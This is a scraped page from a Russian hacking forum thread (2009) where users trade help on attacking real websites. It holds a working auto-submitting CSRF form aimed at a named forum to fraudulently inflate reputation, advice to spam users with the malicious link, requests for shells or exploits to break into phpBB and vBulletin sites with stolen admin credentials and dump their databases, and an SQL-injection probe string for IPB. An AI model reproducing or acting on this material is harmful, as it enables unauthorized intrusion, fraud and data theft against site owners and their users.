ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #131  
Старый 11.01.2009, 22:26
Аватар для Iceangel_
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

2 waik
берешь в руки сниффер(Naviscope, в FF есть плагин Tamper Data и т.п.) и идешь на форум, где ты хочешь репу накрутить. Если есть возможность добавить кому-нибудь репу, добавляешь, отлавливаешь пакет и разбираешься в нем, какие параметры передаются... Потом создаешь скрипт, перебрасывающий юзера на форму добавления репы с нужными параметрами, заливаешь куда-нить, спамишь юзеров форума этим линком...

P.S.
Есть конечно несколько нюансов, которые могут помешать(проверка реферера, метод передачи...) осуществить данный вариант накрутки, но мне почему то кажется, что обойдется без них... =)

P.S.S
Еще могут просечь фишку твою и забанить... =(
CSRF
 
Ответить с цитированием

  #132  
Старый 12.01.2009, 00:10
Аватар для waik
waik
Участник форума
Регистрация: 02.11.2008
Сообщений: 222
Провел на форуме:
3459722

Репутация: 155
По умолчанию

я так делал ,проверки рефера там нету вроде,но я так накрутил может где-то 3 ,мне интересно про какой нить другой способ без заманивания пользователей на ссылки,фейки и.т.д
у меня был примерно такой вот скрипт

PHP код:
<body onload="p.submit()"
<
form action="http://forum.travian.ru/view_reputation.php" method="post" id="p"
<
input type="hidden" name="reputation" value="pos"/>Одобряю</label></div
<
input type=hidden name="score" value="0"
<
input type="hidden" name="reason" value="Всё ясно спс >("
<
input type="hidden" name="do" value="addreputation" /> 
<
input type="hidden" name="p" value="мой id здесь стоит "/> 
Iceangel_ - Спасибо что ответил по теме

Последний раз редактировалось waik; 12.01.2009 в 00:18..
 
Ответить с цитированием

  #133  
Старый 13.01.2009, 03:11
Аватар для Octave_Parango
Octave_Parango
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682

Репутация: 30
По умолчанию

Всех приветствую.

"Курочил" один ресурс, наткнулся на логин:пасс админа от phpBB 2.0.23.
Сам с форумами дело не имел по этому сильно не пинайте.
Вопрос:
Возможно ли залить шелл через админку форума?
Если, ДА, то отпишите каким образом.

Благодарю!

Последний раз редактировалось Octave_Parango; 13.01.2009 в 11:40..
 
Ответить с цитированием

Ищю шелл\сплоит для Vbulletin'a!
  #134  
Старый 16.01.2009, 03:11
Аватар для Listen
Listen
Новичок
Регистрация: 13.01.2008
Сообщений: 3
Провел на форуме:
44030

Репутация: 0
Отправить сообщение для Listen с помощью ICQ
По умолчанию Ищю шелл\сплоит для Vbulletin'a!

Привет.

Ищу шэлл или сплоит для булки 3.7.2

Есть пароль от администратора, но у него есть доступ только к модерки.

Цель: слить базу данных любым способом


Заранее спасибо!
 
Ответить с цитированием

  #135  
Старый 16.01.2009, 04:09
Аватар для P3L3NG
P3L3NG
Banned
Регистрация: 04.06.2008
Сообщений: 402
Провел на форуме:
2267346

Репутация: 719
По умолчанию

у админа по идее должен быть доступ к админке
там внизу есть функция сохранить базу ( в админке)
 
Ответить с цитированием

  #136  
Старый 16.01.2009, 04:18
Аватар для Listen
Listen
Новичок
Регистрация: 13.01.2008
Сообщений: 3
Провел на форуме:
44030

Репутация: 0
Отправить сообщение для Listen с помощью ICQ
По умолчанию

В смысле в булке есть 2 типа админов. Супер-админ и простой.

Может этот даже и супер админ, но ссылка на админку скрыта, и плавает у них в голове. А при нажатии "Управление" - написано not found у них.
 
Ответить с цитированием

  #137  
Старый 18.01.2009, 00:14
Аватар для Merl00k
Merl00k
Познающий
Регистрация: 06.11.2008
Сообщений: 32
Провел на форуме:
934986

Репутация: 21
По умолчанию

Octave_Paran
http://forum.antichat.ru/showpost.php?p=198446&postcount=2 все способы походу )))
 
Ответить с цитированием

  #138  
Старый 18.01.2009, 02:01
Аватар для wi_fix
wi_fix
Новичок
Регистрация: 22.01.2007
Сообщений: 1
Провел на форуме:
14236

Репутация: 0
По умолчанию

вопрос:
Есть способ залить шелл или сделать mysql-inj через форум IPB 2.3.6?
пробовал: act=xmlout&do=check-display-name&name=%2527 в ответ гордое "notfound"
на форуме нет доступа ни к админке ни к модерскому разделу.
также на сервере стоит скрипт aowow может кто с ним сталкивался - может через него удастся залить.
 
Ответить с цитированием

  #139  
Старый 18.01.2009, 13:11
Аватар для DimOnOID
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию

Цитата:
Сообщение от wi_fix  
вопрос:
Есть способ залить шелл или сделать mysql-inj через форум IPB 2.3.6?
пробовал: act=xmlout&do=check-display-name&name=%2527 в ответ гордое "notfound"
на форуме нет доступа ни к админке ни к модерскому разделу.
также на сервере стоит скрипт aowow может кто с ним сталкивался - может через него удастся залить.
Если notfound- форум не уязвим...и насколько я помню..скуль эта до 2.3.5 ...под 2.3.6 или нету..или в привате ...
ты бы ссылку кинул...в раздел просьбы о взломах
 
Ответить с цитированием

XSS
  #140  
Старый 18.01.2009, 21:02
Аватар для SeCriVe
SeCriVe
Новичок
Регистрация: 18.01.2009
Сообщений: 12
Провел на форуме:
190734

Репутация: 41
Отправить сообщение для SeCriVe с помощью ICQ
По умолчанию XSS

подскажите XSS уязвимость сайта ucoz! привязки к ip на данном сайте нету
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ *NIX ] Задай вопрос - получи ответ. Xszz *nix 1547 15.06.2010 15:41
ЕсТь ВоПрос Guma Чаты 4 26.10.2005 21:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ